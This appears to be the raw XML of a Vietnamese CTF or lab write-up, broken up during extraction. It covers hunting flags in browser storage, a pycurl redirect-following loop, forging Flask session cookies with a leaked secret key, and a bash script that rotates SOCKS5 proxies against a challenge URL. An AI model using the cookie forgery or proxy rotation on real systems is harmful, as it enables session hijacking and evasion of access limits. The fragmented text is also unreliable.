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985.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="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85"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="89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10922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09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149600"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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14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149600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14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 flag đầu nằm ở trong từng mục của Storage của Application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flag 5 nằm ở mục Console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72125" cy="2082800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208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code python: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pycurl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 io import BytesIO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server = "10.10.10.10:</w:t>
            </w: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shd w:fill="f5f5f5" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">33314</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr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 = "/promo"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flag = 0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while flag == 0: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curl = pycurl.Curl()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curl.setopt(curl.URL, server + x)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buffer = BytesIO()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curl.setopt(curl.WRITEDATA, buffer)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curl.perform()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content = buffer.getvalue().decode('utf-8')  # Decode bytes to string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curl.close()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print(content)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 "flag" in content:  # No need to convert to string here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flag = 1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result = content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else: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x = ""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 i in range(len(content)):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if content[i] == "\"":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for j in range(i + 1, len(content)):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if content[j] == "\"":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break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x += content[j]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break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print(result)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72125" cy="124460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124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72125" cy="2463800"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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246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72125" cy="2324100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B1: cài tools</w:t>
            </w:r>
          </w:p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link: </w:t>
            </w:r>
            <w:hyperlink r:id="rId13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0"/>
                  <w:szCs w:val="20"/>
                  <w:u w:val="single"/>
                  <w:shd w:fill="f6f8fa" w:val="clear"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">https://github.com/noraj/flask-session-cookie-manager.git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git clone </w:t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cd flask-session-cookie-manager/</w:t>
            </w:r>
          </w:p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B2: lấy key</w:t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GET &lt;url/app.py&gt;</w:t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72125" cy="1676400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167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Cú pháp encode: python3 flask_session_cookie_manager3.py encode -s $secret_key -t $data</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
            <w:pPr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</w:rPr>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="5572125" cy="190500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sine" w:cs="Cousine" w:eastAsia="Cousine" w:hAnsi="Cousine"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gửi request lên server bằng cookie</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
            <w:pPr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curl -X GET "url" --cookie "session=&lt;đoạn mã ở trên&gt;”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72125" cy="1282700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code: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proxies=("103.130.218.135:32338" "103.97.179.115:1080" "38.242.199.111:47460" "172.105.52.78:31106" "128.199.221.91:2215" "192.111.137.35:4145" "103.180.240.44:1080" "152.69.229.244:13650" "185.66.88.86:57752" "78.128.81.220:31623" "187.188.169.169:59329")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url="https://44deec37-1409-4581-a29d-4af514df4b21.web.lms.itmo.xyz/"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cookies_file="cookies.txt"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[ ! -f "$cookies_file" ]; then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touch "$cookies_file"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 proxy in "${proxies[@]}"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echo "Using proxy $proxy"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curl -s -b "$cookies_file" -c "$cookies_file" --socks5 "$proxy" -k "$url"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thay url và các địa chỉ IP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https://spys.one/en/socks-proxy-list/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usin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hyperlink" Target="https://github.com/noraj/flask-session-cookie-manager.git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hyperlink" Target="https://spys.one/en/socks-proxy-list/" TargetMode="Externa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ousine-regular.ttf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Cousine-bold.ttf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Cousine-italic.ttf"/><Relationship Id="rId8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